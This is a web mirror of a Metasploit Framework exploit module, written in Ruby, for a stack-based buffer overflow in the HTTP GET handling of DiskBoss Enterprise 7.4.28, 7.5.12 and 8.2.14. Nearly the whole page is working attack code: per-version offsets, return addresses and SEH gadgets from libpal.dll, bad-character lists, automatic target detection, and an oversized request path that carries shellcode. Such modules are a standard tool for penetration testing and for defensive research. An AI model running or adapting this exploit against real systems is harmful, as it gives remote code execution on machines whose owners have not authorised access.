Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/http/diskboss_get_bof.rb
19669 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = ExcellentRanking
8
9
include Msf::Exploit::Remote::Seh
10
include Msf::Exploit::Remote::HttpClient
11
12
def initialize(info = {})
13
super(
14
update_info(
15
info,
16
'Name' => 'DiskBoss Enterprise GET Buffer Overflow',
17
'Description' => %q{
18
This module exploits a stack-based buffer overflow vulnerability
19
in the web interface of DiskBoss Enterprise v7.5.12, v7.4.28, and v8.2.14,
20
caused by improper bounds checking of the request path in HTTP GET
21
requests sent to the built-in web server. This module has been
22
tested successfully on Windows XP SP3 and Windows 7 SP1.
23
},
24
'License' => MSF_LICENSE,
25
'Author' => [
26
'vportal', # Vulnerability discovery and PoC
27
'Ahmad Mahfouz', # Vulnerability discovery and PoC
28
'Gabor Seljan', # Metasploit module
29
'Jacob Robles' # Metasploit module
30
],
31
'References' => [
32
['EDB', '40869'],
33
['EDB', '42395']
34
],
35
'DefaultOptions' => {
36
'EXITFUNC' => 'thread'
37
},
38
'Platform' => 'win',
39
'Payload' => {
40
'BadChars' => "\x00\x09\x0a\x0d\x20",
41
'Space' => 2000
42
},
43
'Targets' => [
44
[
45
'Automatic Targeting',
46
{
47
'auto' => true
48
}
49
],
50
[
51
'DiskBoss Enterprise v7.4.28',
52
{
53
'Offset' => 2471,
54
'Ret' => 0x1004605c # ADD ESP,0x68 # RETN [libpal.dll]
55
}
56
],
57
[
58
'DiskBoss Enterprise v7.5.12',
59
{
60
'Offset' => 2471,
61
'Ret' => 0x100461da # ADD ESP,0x68 # RETN [libpal.dll]
62
}
63
],
64
[
65
'DiskBoss Enterprise v8.2.14',
66
{
67
'Offset' => 2496,
68
'Ret' => 0x1002A8CA # SEH : # POP EDI # POP ESI # RET 04 [libpal.dll]
69
}
70
]
71
],
72
'Privileged' => true,
73
'DisclosureDate' => '2016-12-05',
74
'DefaultTarget' => 0,
75
'Notes' => {
76
'Reliability' => UNKNOWN_RELIABILITY,
77
'Stability' => UNKNOWN_STABILITY,
78
'SideEffects' => UNKNOWN_SIDE_EFFECTS
79
}
80
)
81
)
82
end
83
84
def check
85
res = send_request_cgi(
86
'method' => 'GET',
87
'uri' => '/'
88
)
89
90
if res && res.code == 200
91
if res.body =~ /DiskBoss Enterprise v(7\.4\.28|7\.5\.12|8\.2\.14)/
92
return Exploit::CheckCode::Vulnerable
93
elsif res.body =~ /DiskBoss Enterprise/
94
return Exploit::CheckCode::Detected
95
end
96
else
97
vprint_error('Unable to determine due to a HTTP connection timeout')
98
return Exploit::CheckCode::Unknown
99
end
100
101
Exploit::CheckCode::Safe
102
end
103
104
def exploit
105
mytarget = target
106
107
if target['auto']
108
mytarget = nil
109
110
print_status('Automatically detecting the target...')
111
112
res = send_request_cgi(
113
'method' => 'GET',
114
'uri' => '/'
115
)
116
117
if res && res.code == 200
118
if res.body =~ /DiskBoss Enterprise v7\.4\.28/
119
mytarget = targets[1]
120
elsif res.body =~ /DiskBoss Enterprise v7\.5\.12/
121
mytarget = targets[2]
122
elsif res.body =~ /DiskBoss Enterprise v8\.2\.14/
123
mytarget = targets[3]
124
end
125
end
126
127
if !mytarget
128
fail_with(Failure::NoTarget, 'No matching target')
129
end
130
131
print_status("Selected Target: #{mytarget.name}")
132
end
133
134
case mytarget
135
when targets[1], targets[2]
136
sploit = make_nops(21)
137
sploit << payload.encoded
138
sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)
139
sploit << [mytarget.ret].pack('V')
140
sploit << rand_text_alpha(2500)
141
when targets[3]
142
seh = generate_seh_record(mytarget.ret)
143
sploit = payload.encoded
144
sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)
145
sploit[sploit.length, seh.length] = seh
146
sploit << make_nops(10)
147
sploit << Rex::Arch::X86.jmp(0xffffbf25) # JMP to ShellCode
148
sploit << rand_text_alpha(5000 - sploit.length)
149
else
150
fail_with(Failure::NoTarget, 'No matching target')
151
end
152
153
send_request_cgi(
154
'method' => 'GET',
155
'uri' => sploit
156
)
157
end
158
end
159
160